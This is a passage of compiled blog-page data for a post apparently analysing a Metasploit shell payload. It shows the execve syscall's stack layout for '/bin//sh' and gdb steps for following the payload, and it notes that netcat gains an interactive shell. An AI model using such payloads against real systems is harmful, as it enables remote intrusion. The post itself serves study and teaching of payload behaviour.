}, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/execve.2.html\"\n }), \"execve()\")), \" does not return, on error -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \" Address Stack\\n +------------+\\n .... | .... |\\n +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef48 | 0xbfffef50 | \\u25C2\\u2014 second argument represent address of address of \\\"/bin//sh\\\"\\n +------------+\\n 0xbfffef4c | 0x00000000 |\\n +------------+\\n (ebx) \\u2014\\u25B8 0xbfffef50 | 0x6e69622f | \\u25C2\\u2014 \\\"/bin\\\" = \\\"/bin//sh\\\" \\u25C2\\u2014 first argument here which is *filename\\n +------------+ +\\n 0xbfffef54 | 0x68732f2f | \\u25C2\\u2014 \\\"//sh\\\"\\n +------------+\\n 0xbfffef58 | 0x00000000 |\\n +------------+\\n .... | .... |\\n +------------+\"))), mdx(\"p\", null, \"Before execute syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/e052575c1e074157f13fc8b43c94648f/d9199/2020-06-17_23-51.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"68.91891891891892%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADEUlEQVQ4y32SXW/iRhSGfVMl/uCjoWlM1gZ/G2ObsTEQDA4hwIYkm2hFkkZqpZWWi/ZHxDdV/lHLZaX+rXY1aN7KJFIr7XYvHp3RjObRe3QON3VG6dRInwc17alzEOZhqZ2ffKPmpOzlmZrkU/0kn9mjPJSs3BeMPBDMPCiqaOW+5OS+uLt/CgTj2eO1B+4ymD2vwhnmDRunchuT4wQzJcawFuLkgCCtEQwqARKpha7o7ogFB91SG0m1g6Tsoyu1MCj5CATzT+42WT49dud4p+h/TQ80Ov3OpgvZoKdVm2ZVj46/D2gk6jSSXJqUPNqveDQ9DGmv7FKyb9CINynhzb+7gg1/X/uNez+4zh+jGa5lhc5rGnt7FLDTss5SUWdj0Wajms96VZt1yy3WK7dZr9Ji6WHIkrLLCG+wiDcZ4U3aFRz4vLbh5t5ZfmUMcC036EXdZW9lD7Omg2HdQ6ZmmDZTZPUESaWNjmCBiDY6fFEdRJUAUalVnGkiefAFc8OFopk/Jrf4Mb2j78MLNlVSDGUFA5UgrvfREW0Q3gQRLESfYe8qESya7BLqGy6u2fl9f4HHbElvyJidN2NkagMjNcFEO8dActDljZePvImokH/Oq1ArhFY+PHKxGs7oLWmxK0fFVPVwaRJcGxHGZQczmaBf9V6EX0hKhP8IScnOV8ESP41X9FwdsH7Fx0hW0a+H6OkZhtoYw8YQccUD2S+Sfjnh65Q3XLGwd/EV7pJL2hEsFuw5GCka+kqMnj3HyJpgbJ4i/tYH4S1Eov0vkotIdIpB0UR04QvGhlv6ZzvhwsxoVo/YQmuyC0NnZ42ILQyfZXWPpUcxy46T3eoQwWaR+ErJY5HosBdh60X4MLp5+pCtkMnxp65kbO/D+vYhbGwvzOF2aY23ieRsyb6xjXjzfyG8+em15d+5+/Tdrx9GK/TKHhLJwkOo4IewiRtviit7guFBgFiw0f0KxXu/aJnX/uAmziDI9ORnV2h+dPk364l+uJ7o8vpECdY92V/7ZX1t771Z23vK1/jo7Cm/mHvH838AJYl0/OjJ5UIAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"sys_execue\",\n \"title\": \"sys_execue\",\n \"src\": \"/static/e052575c1e074157f13fc8b43c94648f/fcda8/2020-06-17_23-51.png\",\n \"srcSet\": [\"/static/e052575c1e074157f13fc8b43c94648f/12f09/2020-06-17_23-51.png 148w\", \"/static/e052575c1e074157f13fc8b43c94648f/e4a3f/2020-06-17_23-51.png 295w\", \"/static/e052575c1e074157f13fc8b43c94648f/fcda8/2020-06-17_23-51.png 590w\", \"/static/e052575c1e074157f13fc8b43c94648f/efc66/2020-06-17_23-51.png 885w\", \"/static/e052575c1e074157f13fc8b43c94648f/d9199/2020-06-17_23-51.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Check out gdb follow execution info:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" show follow-fork-mode\"))), mdx(\"p\", null, \"Set to follow parent:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"set\"), \" follow-fork-mode parent\"))), mdx(\"p\", null, \"Disable previous breakpoint:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" disable breakpoints \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"gdb\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"continue\")))), mdx(\"p\", null, \"Continue to execute syscall will launch the program /bin/dash, netcat will have an interactive shell.\"), mdx(\"h2\", null, \"References\"), mdx(\"p\", null, \"x86 Instruction Set: \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://c9x.me/x86/\"\n }), \"https://c9x.me/x86/\")), mdx(\"p\", null, \"Ubuntu 16.04 Manual: \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/\"\n }), \"https://manpages.ubuntu.com/manpages/xenial/man2/\")), mdx(\"p\", null, \"System Call Table: \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\"\n }), \"https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl\")), mdx(\"p\", null, \"Stackoverflow Question: \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://stackoverflow.com/questions/9940391/looking-for-a-detailed-document-on-linux-system-calls\"\n }), \"https://stackoverflow.com/questions/9940391/looking-for-a-detailed-document-on-linux-system-calls\")));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"MSF Payload Analysis I","date":"June 18, 2020","description":null}}},"pageContext":{"slug":"/msf-payload-analysis-i/","previous":{"fields":{"slug":"/Vigenère-cipher-implementation/"},"frontmatter":{"title":"Vigenère cipher implementation"}},"next":{"fields":{"slug":"/raven:2-writeup/"},"frontmatter":{"title":"Raven:2 Writeup"}}}}}